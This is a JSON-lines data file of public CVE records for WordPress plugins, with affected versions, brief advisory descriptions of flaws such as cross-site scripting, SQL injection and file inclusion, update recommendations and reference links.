{"CVE_ID":"CVE-2023-4800","slug":"dologin","versionEndExcluding":"3.7.1","description":"The DoLogin Security WordPress plugin before 3.7.1 does not restrict the access of a widget that shows the IPs of failed logins to low privileged users.","recommendation":"Update to version 3.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7eae1434-8c7a-4291-912d-a4a07b73ee56\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7eae1434-8c7a-4291-912d-a4a07b73ee56\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6228","slug":"sina-extension-for-elementor","versionImpact":"3.7.0","versionEndExcluding":"3.7.1","description":"The Sina Extension for Elementor (Header Builder, Footer Builter, Theme Builder, Slider, Gallery, Form, Modal, Data Table Free Elementor Widgets & Elementor Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `Sina Posts`, `Sina Blog Post` and `Sina Table` widgets in all versions up to, and including, 3.7.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.7.0\\\/widgets\\\/advanced\\\/sina-blogpost.php#L2066\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.7.0\\\/widgets\\\/advanced\\\/sina-blogpost.php#L2066\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.7.0\\\/widgets\\\/basic\\\/sina-table.php#L1659\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.7.0\\\/widgets\\\/basic\\\/sina-table.php#L1659\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.7.0\\\/widgets\\\/theme_builder\\\/sina-posts.php#L1879\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.7.0\\\/widgets\\\/theme_builder\\\/sina-posts.php#L1879\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd929710-bdb4-42e1-b409-df41adc22392?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd929710-bdb4-42e1-b409-df41adc22392?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13363","slug":"adthrive-ads","versionImpact":"3.6.3","versionEndExcluding":"3.7.1","description":"The Raptive Ads plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'poc' parameter in all versions up to, and including, 3.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adthrive-ads\\\/trunk\\\/components\\\/static-files\\\/partials\\\/eyereturn\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adthrive-ads\\\/trunk\\\/components\\\/static-files\\\/partials\\\/eyereturn\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adthrive-ads\\\/trunk\\\/components\\\/static-files\\\/partials\\\/eyereturn\\\/eyereturn.html\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adthrive-ads\\\/trunk\\\/components\\\/static-files\\\/partials\\\/eyereturn\\\/eyereturn.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3d535b3-ad52-4322-988e-7d560dbfe3a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3d535b3-ad52-4322-988e-7d560dbfe3a3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0375","slug":"easy-affiliate-links","versionEndExcluding":"3.7.1","description":"The Easy Affiliate Links WordPress plugin before 3.7.1 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/915d6add-d3e2-4ced-969e-9523981ac886\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/915d6add-d3e2-4ced-969e-9523981ac886\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4670","slug":"all-in-one-video-gallery","versionImpact":"3.6.5","versionEndExcluding":"3.7.0","description":"The All-in-One Video Gallery plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.6.5 via the aiovg_search_form shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 3.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2793547-5edf-4d2a-bc3b-fcaeed62963d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2793547-5edf-4d2a-bc3b-fcaeed62963d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085217\\\/all-in-one-video-gallery\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085217\\\/all-in-one-video-gallery\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5626","slug":"intelly-related-posts","versionImpact":"3.6.0","versionEndExcluding":"3.7.0","description":"The Inline Related Posts WordPress plugin before 3.7.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 3.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b03f450-4982-4f6c-a6f1-f7e85b1deec1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b03f450-4982-4f6c-a6f1-f7e85b1deec1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0506","slug":"rise-blocks","versionImpact":"3.6","versionEndExcluding":"3.7","description":"The Rise Blocks \u2013 A Complete Gutenberg Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the titleTag parameter in all versions up to, and including, 3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rise-blocks\\\/tags\\\/3.6\\\/classes\\\/blocks\\\/site-identity.php#L375\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rise-blocks\\\/tags\\\/3.6\\\/classes\\\/blocks\\\/site-identity.php#L375\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ec012e7-b997-466e-8676-8e9467473eae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ec012e7-b997-466e-8676-8e9467473eae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2578","slug":"buymeacoffee","versionEndExcluding":"3.7","description":"The Buy Me a Coffee WordPress plugin before 3.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4dad1c0d-bcf9-4486-bd8e-387ac8e6c892\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4dad1c0d-bcf9-4486-bd8e-387ac8e6c892\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4631","slug":"dologin","versionEndExcluding":"3.7","description":"The DoLogin Security WordPress plugin before 3.7 uses headers such as the X-Forwarded-For to retrieve the IP address of the request, which could lead to IP spoofing.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28613fc7-1400-4553-bcc3-24df1cee418e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28613fc7-1400-4553-bcc3-24df1cee418e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4549","slug":"dologin","versionEndExcluding":"3.7","description":"The DoLogin Security WordPress plugin before 3.7 does not properly sanitize IP addresses coming from the X-Forwarded-For header, which can be used by attackers to conduct Stored XSS attacks via WordPress' login form.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8aebead0-0eab-4d4e-8ceb-8fea0760374f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8aebead0-0eab-4d4e-8ceb-8fea0760374f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5980","slug":"bsk-gravityforms-blacklist","versionImpact":"3.6.3","versionEndExcluding":"3.7","description":"The BSK Forms Blacklist WordPress plugin before 3.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b621261b-ae18-4853-9ace-7b773810529a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b621261b-ae18-4853-9ace-7b773810529a\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4995","slug":"embed-calendly-scheduling","versionImpact":"3.6","versionEndExcluding":"3.7","description":"The Embed Calendly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'calendly' shortcode in versions up to, and including, 3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1bf83df-7a1f-4572-9c8d-1013750d51d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1bf83df-7a1f-4572-9c8d-1013750d51d7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-calendly-scheduling\\\/tags\\\/3.6\\\/includes\\\/embed.php#L140\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-calendly-scheduling\\\/tags\\\/3.6\\\/includes\\\/embed.php#L140\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4290","slug":"cyr3lat","versionImpact":"3.5","versionEndExcluding":"3.7","description":"The Cyr to Lat plugin for WordPress is vulnerable to authenticated SQL Injection via the 'ctl_sanitize_title' function in versions up to, and including, 3.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This potentially allows authenticated users with the ability to add or modify terms or tags to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. A partial patch became available in version 3.6 and the issue was fully patched in version 3.7.","recommendation":"Update to version 3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cyr3lat\\\/trunk\\\/cyr-to-lat.php?rev=1117224#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cyr3lat\\\/trunk\\\/cyr-to-lat.php?rev=1117224#L69\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9c29130-1b42-4edd-ad62-6f635e03ae31?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9c29130-1b42-4edd-ad62-6f635e03ae31?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36749","slug":"easy-testimonials","versionEndExcluding":"3.7","description":"The Easy Testimonials plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.6.1. This is due to missing or incorrect nonce validation on the saveCustomFields() function. This makes it possible for unauthenticated attackers to save custom fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2370405%40easy-testimonials&new=2370405%40easy-testimonials&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2370405%40easy-testimonials&new=2370405%40easy-testimonials&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8da49c2e-576c-490b-b812-96d15b6d2b1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8da49c2e-576c-490b-b812-96d15b6d2b1b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7716","slug":"gs-logo-slider","versionImpact":"3.6.8","versionEndExcluding":"3.6.9","description":"The Logo Slider  WordPress plugin before 3.6.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cfa67c43-6f09-43f5-9fbe-32a98a82f548\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cfa67c43-6f09-43f5-9fbe-32a98a82f548\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10533","slug":"wp-whatsapp","versionImpact":"3.6.8","versionEndExcluding":"3.6.9","description":"The WP Chat App plugin for WordPress is vulnerable to unauthorized plugin installation due to a missing capability check on the ajax_install_plugin() function in all versions up to, and including, 3.6.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install the filebird plugin.","recommendation":"Update to version 3.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26f73bfe-f41a-4045-9d72-21181a9a704f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26f73bfe-f41a-4045-9d72-21181a9a704f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-whatsapp\\\/trunk\\\/includes\\\/Cross.php#L206\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-whatsapp\\\/trunk\\\/includes\\\/Cross.php#L206\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-whatsapp\\\/tags\\\/3.6.7\\\/includes\\\/Cross.php#L206\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-whatsapp\\\/tags\\\/3.6.7\\\/includes\\\/Cross.php#L206\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186930\\\/wp-whatsapp\\\/trunk\\\/includes\\\/Cross.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186930\\\/wp-whatsapp\\\/trunk\\\/includes\\\/Cross.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10675","slug":"affiliate-toolkit-starter","versionImpact":"3.6.7","versionEndExcluding":"3.6.8","description":"The affiliate-toolkit plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via a URL in all versions up to, and including, 3.6.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3192067%40affiliate-toolkit-starter&new=3192067%40affiliate-toolkit-starter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3192067%40affiliate-toolkit-starter&new=3192067%40affiliate-toolkit-starter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f45afce1-cb37-4e7e-90b2-6ae1b6400376?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f45afce1-cb37-4e7e-90b2-6ae1b6400376?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5252","slug":"fareharbor","versionImpact":"3.6.7","versionEndExcluding":"3.6.8","description":"The FareHarbor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 3.6.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fareharbor\\\/tags\\\/3.6.7\\\/fareharbor.php#L287\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fareharbor\\\/tags\\\/3.6.7\\\/fareharbor.php#L287\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42ad6fef-4280-45db-a3e2-6d7522751fa7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42ad6fef-4280-45db-a3e2-6d7522751fa7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25021","slug":"fareharbor","versionEndExcluding":"3.6.7","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in FareHarbor FareHarbor for WordPress plugin <=\u00a03.6.6 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fareharbor\\\/wordpress-fareharbor-for-wordpress-plugin-3-6-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fareharbor\\\/wordpress-fareharbor-for-wordpress-plugin-3-6-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7063","slug":"elementskit","versionImpact":"3.6.6","versionEndExcluding":"3.6.7","description":"The ElementsKit Pro plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.6 via the 'render_raw' function. This can allow authenticated attackers, with Contributor-level permissions and above, to extract sensitive data including private, future, and draft posts.","recommendation":"Update to version 3.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35dd18b-0f05-482f-aef3-08977cbec8a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35dd18b-0f05-482f-aef3-08977cbec8a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/\",\"name\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4648","slug":"wp-customer-reviews","versionImpact":"3.6.6","versionEndExcluding":"3.6.7","description":"The WP Customer Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 3.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f81950be-de32-4fa1-94fe-42667414fe2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f81950be-de32-4fa1-94fe-42667414fe2d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2965658\\\/wp-customer-reviews\\\/trunk?contextall=1&old=2882143&old_path=%2Fwp-customer-reviews%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2965658\\\/wp-customer-reviews\\\/trunk?contextall=1&old=2882143&old_path=%2Fwp-customer-reviews%2Ftrunk\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4686","slug":"wp-customer-reviews","versionEndExcluding":"3.6.7","description":"The WP Customer Reviews plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 3.6.6 via the ajax_enabled_posts function. This can allow authenticated attackers to extract sensitive data such as post titles and slugs, including those of protected and trashed posts and pages in addition to other post types such as galleries.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24b9984c-ec33-4492-815b-67a21ac4da0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24b9984c-ec33-4492-815b-67a21ac4da0e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-customer-reviews\\\/trunk\\\/include\\\/admin\\\/wp-customer-reviews-3-admin.php?rev=2617376#L866\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-customer-reviews\\\/trunk\\\/include\\\/admin\\\/wp-customer-reviews-3-admin.php?rev=2617376#L866\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2965656\\\/wp-customer-reviews\\\/trunk?contextall=1&old=2882143&old_path=%2Fwp-customer-reviews%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2965656\\\/wp-customer-reviews\\\/trunk?contextall=1&old=2882143&old_path=%2Fwp-customer-reviews%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11724","slug":"gdpr-cookie-consent","versionImpact":"3.6.5","versionEndExcluding":"3.6.6","description":"The Cookie Consent for WP \u2013 Cookie Consent, Consent Log, Cookie Scanner, Script Blocker (for GDPR, CCPA & ePrivacy) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpl_script_save AJAX action in all versions up to, and including, 3.6.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to whitelist scripts.","recommendation":"Update to version 3.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203552\\\/gdpr-cookie-consent\\\/tags\\\/3.6.6\\\/public\\\/modules\\\/script-blocker\\\/class-wpl-cookie-consent-script-blocker.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203552\\\/gdpr-cookie-consent\\\/tags\\\/3.6.6\\\/public\\\/modules\\\/script-blocker\\\/class-wpl-cookie-consent-script-blocker.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9a1de53-330f-49ab-a8f8-22753c62bd36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9a1de53-330f-49ab-a8f8-22753c62bd36?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7064","slug":"elementskit","versionImpact":"3.6.5","versionEndExcluding":"3.6.6","description":"The ElementsKit Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/181e6f3a-dbcf-44a6-b725-6325d9e56453?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/181e6f3a-dbcf-44a6-b725-6325d9e56453?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/\",\"name\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
